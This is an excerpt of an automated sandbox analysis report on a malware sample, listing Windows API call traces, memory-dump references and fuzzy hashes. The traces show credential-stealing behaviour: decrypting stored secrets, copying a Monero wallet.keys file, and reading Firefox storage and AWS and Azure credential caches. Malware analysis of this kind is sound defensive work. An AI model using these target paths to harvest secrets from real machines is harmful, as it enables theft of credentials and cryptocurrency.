                            • Instruction Fuzzy Hash: ECF0F9702443126BE7301B65AC49F57BBADAF09B50F201115FE45EA2D0D7F49C40CAA4
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: !pK$/4~J$Jum{
                            • API String ID: 0-3477825694
                            • Opcode ID: be37e189e37236cff981cb2c3bc46f2216d9bbd10d34273ce41ae8c32c92293e
                            • Instruction ID: 06f44584e22fd6a616b627d0f81bd138f887d9cb768a8f565220a6afffe09c2d
                            • Opcode Fuzzy Hash: be37e189e37236cff981cb2c3bc46f2216d9bbd10d34273ce41ae8c32c92293e
                            • Instruction Fuzzy Hash: EFB2E4F2A0C2049FE708AF29EC8567ABBE5EF94720F16493DEAC5C7744E63558408787
                            APIs
                            • CoCreateInstance.COMBASE(0045B110,00000000,00000001,0045B100,?), ref: 0044CB06
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0044CB46
                            • lstrcpyn.KERNEL32(?,?,00000104), ref: 0044CBC9
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                            • String ID:
                            • API String ID: 1940255200-0
                            • Opcode ID: f1e208fb4f685b633275f1a0fc65707b19477e67f8043b01830a7f82712a59ae
                            • Instruction ID: b75ec98b9f67dc660066d074002a809375b47267d4ff74880160ead17a90e926
                            • Opcode Fuzzy Hash: f1e208fb4f685b633275f1a0fc65707b19477e67f8043b01830a7f82712a59ae
                            • Instruction Fuzzy Hash: 98317871A40614BFD750DB94CC82F99B7B9DB88B10F104185FA14EB2D0D7B4AD44CB90
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00439B9F
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00439BB3
                            • LocalFree.KERNEL32(?), ref: 00439BD7
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: 0626ee5093f020a6cbaf2e05218f88fff5c9d0c6114e77c1d8f6b65ca5eead5f
                            • Instruction ID: 23494072be9fee958a67e36a70f54ec40641ae8a4ff0a1b21ffa78873d515ac5
                            • Opcode Fuzzy Hash: 0626ee5093f020a6cbaf2e05218f88fff5c9d0c6114e77c1d8f6b65ca5eead5f
                            • Instruction Fuzzy Hash: DC01CD75A41319ABE7109FA4DC45FAFB77DEB48B00F104555EE04AB380D7B5AE008BE5
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: &@sy$[%Xi$aUY
                            • API String ID: 0-756594915
                            • Opcode ID: b82af6edf5c20ed4cb639979fbfee1b32bbbf12d24244deec9362aaf3db59737
                            • Instruction ID: 7486272fd115ccb20a1783e5c82fa942bf99d14bdf007a67267b63fff41a759a
                            • Opcode Fuzzy Hash: b82af6edf5c20ed4cb639979fbfee1b32bbbf12d24244deec9362aaf3db59737
                            • Instruction Fuzzy Hash: 7322E6F3A082109FE314AE2DEC85B7AB7E5EF94720F1A453DEAC4D3744EA3558058692
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Wjw{
                            • API String ID: 0-2507661684
                            • Opcode ID: 1dbb604e7de1c0b5e79c64f2b37441bb11810fb0b1705e0c2c5603b9a80e2fe7
                            • Instruction ID: 7318c0a51b8ed07a229903ebf8bd4a06bde80262fd63104a8d46eca1851103e3
                            • Opcode Fuzzy Hash: 1dbb604e7de1c0b5e79c64f2b37441bb11810fb0b1705e0c2c5603b9a80e2fe7
                            • Instruction Fuzzy Hash: FCB2E5F360C2049FE304AE2DEC8567ABBE5EF94320F16493DEAC587744EA3558058B97
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: i@wh
                            • API String ID: 0-887614478
                            • Opcode ID: 5d692a0ed414e9479637c545554461b18340469c0a8dc1fc405da5db7b33715f
                            • Instruction ID: 57c6defc5e79b6d00efd2081db5f6c67f8dce923beb3d7c60c745bb5f16b617a
                            • Opcode Fuzzy Hash: 5d692a0ed414e9479637c545554461b18340469c0a8dc1fc405da5db7b33715f
                            • Instruction Fuzzy Hash: FF615DF3E182105FE7059D2EDC847BBB7DADBD4320F2A853DEAC993784E93558058292
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: {\_
                            • API String ID: 0-535716125
                            • Opcode ID: 3c8769fb99a9d54582a55a6e8b3ba83169306fc00e9bd8b18a2fa6eacf76fdd5
                            • Instruction ID: b96f7b5af3de159f2180b4f7551045fcc48154dcc7ff999646ac6cc54af2cbd9
                            • Opcode Fuzzy Hash: 3c8769fb99a9d54582a55a6e8b3ba83169306fc00e9bd8b18a2fa6eacf76fdd5
                            • Instruction Fuzzy Hash: 2D5134F7A087189FE3087A2AEC457BAB7E9DB90320F0B853DDAC483740ED75180586C6
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d7398d31679b9e4061406ef1defab6291e226a1997bb4bc2ff88fe232d6d0fb1
                            • Instruction ID: f0a0787be1f2b43414a3743b52de7b0a36f811fc682b9add16daf498adf973cc
                            • Opcode Fuzzy Hash: d7398d31679b9e4061406ef1defab6291e226a1997bb4bc2ff88fe232d6d0fb1
                            • Instruction Fuzzy Hash: CA51D1B26086009FE304AE2DDC8576AFBE6EFD8320F16493DD7C4C3780EA7958418796
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1fc59e9a8720580aca252ec54eb55ccf0ebd5176e56cfe289e165926893983e8
                            • Instruction ID: 1d78bdb5c91cf6ba51773d1b60047f8788987ad5ca579ce046ebf18eaf543c18
                            • Opcode Fuzzy Hash: 1fc59e9a8720580aca252ec54eb55ccf0ebd5176e56cfe289e165926893983e8
                            • Instruction Fuzzy Hash: D951F6F3E082109BE3046A6DDC8576AB7D5EB98320F1A463DEEC8D7344E57A5C1587C2
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ecdfe98b9305227f1eea489436f3999ef9a8a7492f54807412cf49ce4b1ec836
                            • Instruction ID: d5637e1bae844a8e4c96d1a208c8775804a09cb1a06454a7e21d2f128d31b88b
                            • Opcode Fuzzy Hash: ecdfe98b9305227f1eea489436f3999ef9a8a7492f54807412cf49ce4b1ec836
                            • Instruction Fuzzy Hash: ED415AF3A182004BF3086E29EC5577AB7E6EBD4720F2B423DD7D187B84E97855058687
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d73583208387c4b7b3f77aa34a521cd3ca1f28f39958986cfeb4cc560f43797d
                            • Instruction ID: 854edc0a17d7749c79b0643d9a5b7bb4e818f6bd2055318baa49a65afcf637ef
                            • Opcode Fuzzy Hash: d73583208387c4b7b3f77aa34a521cd3ca1f28f39958986cfeb4cc560f43797d
                            • Instruction Fuzzy Hash: 053122F3F083141BF304A869ECC5776B6D9E794324F2B823EEA58D3B80E4799C054291
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 67b31835f35ff71f96a21c861ef5718615ec0b0d21d5ce4a20bcdc14b0ac130c
                            • Instruction ID: 5f8aafa5365601669add6ae608279bf9620a4b1f6df1e0677e5e9859803009eb
                            • Opcode Fuzzy Hash: 67b31835f35ff71f96a21c861ef5718615ec0b0d21d5ce4a20bcdc14b0ac130c
                            • Instruction Fuzzy Hash: A931A9F3E192005BE3009939DC4576AB2D79BE0331F2F823DDE88937C4EC3859064686
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9553a601dd137d25ac4bb968fd9742c349437dca6b8993723568d5a447d8ff19
                            • Instruction ID: 7029bcb9a270abc5a373208420cdd32106902527a799ee016f58ff652174961f
                            • Opcode Fuzzy Hash: 9553a601dd137d25ac4bb968fd9742c349437dca6b8993723568d5a447d8ff19
                            • Instruction Fuzzy Hash: 8A2122B251C204DFE706BF29C88266AFBF5FF98650F164D2DD6D482610E6319890CB87
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00448636
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044866D
                            • lstrcpy.KERNEL32(?,00000000), ref: 004486AA
                            • StrStrA.SHLWAPI(?,00FFF190), ref: 004486CF
                            • lstrcpyn.KERNEL32(006693D0,?,00000000), ref: 004486EE
                            • lstrlen.KERNEL32(?), ref: 00448701
                            • wsprintfA.USER32 ref: 00448711
                            • lstrcpy.KERNEL32(?,?), ref: 00448727
                            • StrStrA.SHLWAPI(?,00FFF280), ref: 00448754
                            • lstrcpy.KERNEL32(?,006693D0), ref: 004487B4
                            • StrStrA.SHLWAPI(?,00FFF298), ref: 004487E1
                            • lstrcpyn.KERNEL32(006693D0,?,00000000), ref: 00448800
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                            • String ID: %s%s
                            • API String ID: 2672039231-3252725368
                            • Opcode ID: 17fead226b996ac1d6206d02e258da87631d68a4c34e9282c83382b93ef8ed21
                            • Instruction ID: 9ea8bd155e60d7207493250bbca3dd851377f0ef3c416745a26d0a01ab117fba
                            • Opcode Fuzzy Hash: 17fead226b996ac1d6206d02e258da87631d68a4c34e9282c83382b93ef8ed21
                            • Instruction Fuzzy Hash: 96F14C71900114EFDB10DB74DD48A9AB7BAEF88304F104659F909E7351DBB4AE05CBA5
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00431F9F
                            • lstrlen.KERNEL32(00FF91A0), ref: 00431FAE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431FDB
                            • lstrcat.KERNEL32(00000000,?), ref: 00431FE3
                            • lstrlen.KERNEL32(00461794), ref: 00431FEE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043200E
                            • lstrcat.KERNEL32(00000000,00461794), ref: 0043201A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00432042
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043204D
                            • lstrlen.KERNEL32(00461794), ref: 00432058
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00432075
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00432081
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004320AC
                            • lstrlen.KERNEL32(?), ref: 004320E4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00432104
                            • lstrcat.KERNEL32(00000000,?), ref: 00432112
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00432139
                            • lstrlen.KERNEL32(00461794), ref: 0043214B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043216B
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00432177
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043219D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 004321A8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004321D4
                            • lstrlen.KERNEL32(?), ref: 004321EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043220A
                            • lstrcat.KERNEL32(00000000,?), ref: 00432218
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00432242
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043227F
                            • lstrlen.KERNEL32(00FFDC48), ref: 0043228D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004322B1
                            • lstrcat.KERNEL32(00000000,00FFDC48), ref: 004322B9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004322F7
                            • lstrcat.KERNEL32(00000000), ref: 00432304
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043232D
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00432356
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00432382
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004323BF
                            • DeleteFileA.KERNEL32(00000000), ref: 004323F7
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00432444
                            • FindClose.KERNEL32(00000000), ref: 00432453
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                            • String ID:
                            • API String ID: 2857443207-0
                            • Opcode ID: 110848ebc363536c8a2c8d5d59a7dee965df1f05fcb1e39ab200f4a818c475a5
                            • Instruction ID: d6122eb7ad62e8d0c0d4b0ef67f1746fd73c604eece3b6c556272b67c26bf8b3
                            • Opcode Fuzzy Hash: 110848ebc363536c8a2c8d5d59a7dee965df1f05fcb1e39ab200f4a818c475a5
                            • Instruction Fuzzy Hash: 9EE17271A103169FCB21EF75DE85A9F77B9AF08304F04612AF905A7211DBB8DD05CBA8
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00446445
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00446480
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 004464AA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004464E1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446506
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0044650E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00446537
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FolderPathlstrcat
                            • String ID: \..\
                            • API String ID: 2938889746-4220915743
                            • Opcode ID: 18ba190abcbc138dbb0b140453d32b5c6ac77640d8d78e7bd51ea96ea99d619d
                            • Instruction ID: edfbc126608c4df09dfce014914281ebefe65c4ff24dd27402431c6ff04c2446
                            • Opcode Fuzzy Hash: 18ba190abcbc138dbb0b140453d32b5c6ac77640d8d78e7bd51ea96ea99d619d
                            • Instruction Fuzzy Hash: 9BF1CE70A012059FEB21AF79D949AAF77B9AF05308F06502AF845D7351DB7CCC05CBAA
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004443A3
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004443D6
                            • lstrcpy.KERNEL32(00000000,?), ref: 004443FE
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00444409
                            • lstrlen.KERNEL32(\storage\default\), ref: 00444414
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00444431
                            • lstrcat.KERNEL32(00000000,\storage\default\), ref: 0044443D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00444466
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00444471
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00444498
                            • lstrcpy.KERNEL32(00000000,?), ref: 004444D7
                            • lstrcat.KERNEL32(00000000,?), ref: 004444DF
                            • lstrlen.KERNEL32(00461794), ref: 004444EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00444507
                            • lstrcat.KERNEL32(00000000,00461794), ref: 00444513
                            • lstrlen.KERNEL32(.metadata-v2), ref: 0044451E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044453B
                            • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00444547
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044456E
                            • lstrcpy.KERNEL32(00000000,?), ref: 004445A0
                            • GetFileAttributesA.KERNEL32(00000000), ref: 004445A7
                            • lstrcpy.KERNEL32(00000000,?), ref: 00444601
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044462A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00444653
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044467B
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004446AF
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                            • String ID: .metadata-v2$\storage\default\
                            • API String ID: 1033685851-762053450
                            • Opcode ID: b4121b0565e4c8408104dd8b1254e7cd65364662c05b6d8b34887354da8190a9
                            • Instruction ID: 039c1b0df98d2ca0db0c9e175bb241444388b12a6b5d08aa5b5920f8e11d6ff1
                            • Opcode Fuzzy Hash: b4121b0565e4c8408104dd8b1254e7cd65364662c05b6d8b34887354da8190a9
                            • Instruction Fuzzy Hash: 62B1BF71A112069BEB21FF75DA49BAF77A9AF44304F11202AF845D3351DBBCDC018BA8
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004457D5
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00445804
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00445835
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044585D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00445868
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00445890
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004458C8
                            • lstrcat.KERNEL32(00000000,00000000), ref: 004458D3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004458F8
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044592E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00445956
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00445961
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00445988
                            • lstrlen.KERNEL32(00461794), ref: 0044599A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004459B9
                            • lstrcat.KERNEL32(00000000,00461794), ref: 004459C5
                            • lstrlen.KERNEL32(00FFDE70), ref: 004459D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004459F7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00445A02
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00445A2C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00445A58
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00445A5F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00445AB7
                            • lstrcpy.KERNEL32(00000000,?), ref: 00445B2D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00445B56
                            • lstrcpy.KERNEL32(00000000,?), ref: 00445B89
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00445BB5
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00445BEF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00445C4C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00445C70
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 2428362635-0
                            • Opcode ID: 8fe83d77723b0604b93a68978ab24d48fc8424b9767fd2a055e971c47aa0ef81
                            • Instruction ID: 8f11f8809b9ba7760936ba8156b9029b1e7a8467e7166bb6da5f9bc54123da88
                            • Opcode Fuzzy Hash: 8fe83d77723b0604b93a68978ab24d48fc8424b9767fd2a055e971c47aa0ef81
                            • Instruction Fuzzy Hash: 5902D171A006059FDF21EF79C989AAFB7B9AF08304F14512AF845A3352DB78DC45CB98
                            APIs
                              • Part of subcall function 00431120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00431135
                              • Part of subcall function 00431120: RtlAllocateHeap.NTDLL(00000000), ref: 0043113C
                              • Part of subcall function 00431120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00431159
                              • Part of subcall function 00431120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00431173
                              • Part of subcall function 00431120: RegCloseKey.ADVAPI32(?), ref: 0043117D
                            • lstrcat.KERNEL32(?,00000000), ref: 004311C0
                            • lstrlen.KERNEL32(?), ref: 004311CD
                            • lstrcat.KERNEL32(?,.keys), ref: 004311E8
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043121F
                            • lstrlen.KERNEL32(00FF91A0), ref: 0043122D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431251
                            • lstrcat.KERNEL32(00000000,00FF91A0), ref: 00431259
                            • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00431264
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431288
                            • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00431294
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004312BA
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004312FF
                            • lstrlen.KERNEL32(00FFDC48), ref: 0043130E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431335
                            • lstrcat.KERNEL32(00000000,?), ref: 0043133D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00431378
                            • lstrcat.KERNEL32(00000000), ref: 00431385
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004313AC
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 004313D5
                            • lstrcpy.KERNEL32(00000000,?), ref: 00431401
                            • lstrcpy.KERNEL32(00000000,?), ref: 0043143D
                              • Part of subcall function 0044EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0044EE12
                            • DeleteFileA.KERNEL32(?), ref: 00431471
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                            • String ID: .keys$\Monero\wallet.keys
                            • API String ID: 2881711868-3586502688
                            • Opcode ID: 65e20e3449bd46728a4f5249a2cfd6daaaf2db77b8a61e7bb93eea6664a58c5f
                            • Instruction ID: 8957c9b5279cbea23cb8797f93b247cdde40b9f0db5671a920c8503bbf80d9d9
                            • Opcode Fuzzy Hash: 65e20e3449bd46728a4f5249a2cfd6daaaf2db77b8a61e7bb93eea6664a58c5f
                            • Instruction Fuzzy Hash: 8DA1B571B002059BCB21EF75DD89A9FB7B9AF4C304F14216AF905E7261DB78DD018BA8
                            APIs
                            • memset.MSVCRT ref: 0044E740
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0044E769
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044E79F
                            • lstrcat.KERNEL32(?,00000000), ref: 0044E7AD
                            • lstrcat.KERNEL32(?,\.azure\), ref: 0044E7C6
                            • memset.MSVCRT ref: 0044E805
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0044E82D
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044E85F
                            • lstrcat.KERNEL32(?,00000000), ref: 0044E86D
                            • lstrcat.KERNEL32(?,\.aws\), ref: 0044E886
                            • memset.MSVCRT ref: 0044E8C5
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0044E8F1
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044E920
                            • lstrcat.KERNEL32(?,00000000), ref: 0044E92E
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0044E947
                            • memset.MSVCRT ref: 0044E986
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$memset$FolderPathlstrcpy
                            • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 4067350539-3645552435
                            • Opcode ID: d73a0b55b112b01a3037156e3d5b019def5bcbb0d00a5c2f3d59f9ba6d3296c4
                            • Instruction ID: 00a60d42f54d01d4c85108e25d9ffebbd3ef2764c925006d51def2230ecc665c
                            • Opcode Fuzzy Hash: d73a0b55b112b01a3037156e3d5b019def5bcbb0d00a5c2f3d59f9ba6d3296c4
                            • Instruction Fuzzy Hash: A471F971A40218ABDB25EB64DC46FED7378BF48700F101899BB199B1C1DAF89E448B69
                            APIs
                            • lstrcpy.KERNEL32 ref: 0044ABCF
                            • lstrlen.KERNEL32(00FFF160), ref: 0044ABE5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044AC0D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0044AC18
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044AC41
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044AC84
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0044AC8E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044ACB7
                            • lstrlen.KERNEL32(00464AD4), ref: 0044ACD1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044ACF3
                            • lstrcat.KERNEL32(00000000,00464AD4), ref: 0044ACFF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044AD28
                            • lstrlen.KERNEL32(00464AD4), ref: 0044AD3A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044AD5C
                            • lstrcat.KERNEL32(00000000,00464AD4), ref: 0044AD68
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044AD91
                            • lstrlen.KERNEL32(00FFF148), ref: 0044ADA7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044ADCF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0044ADDA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044AE03
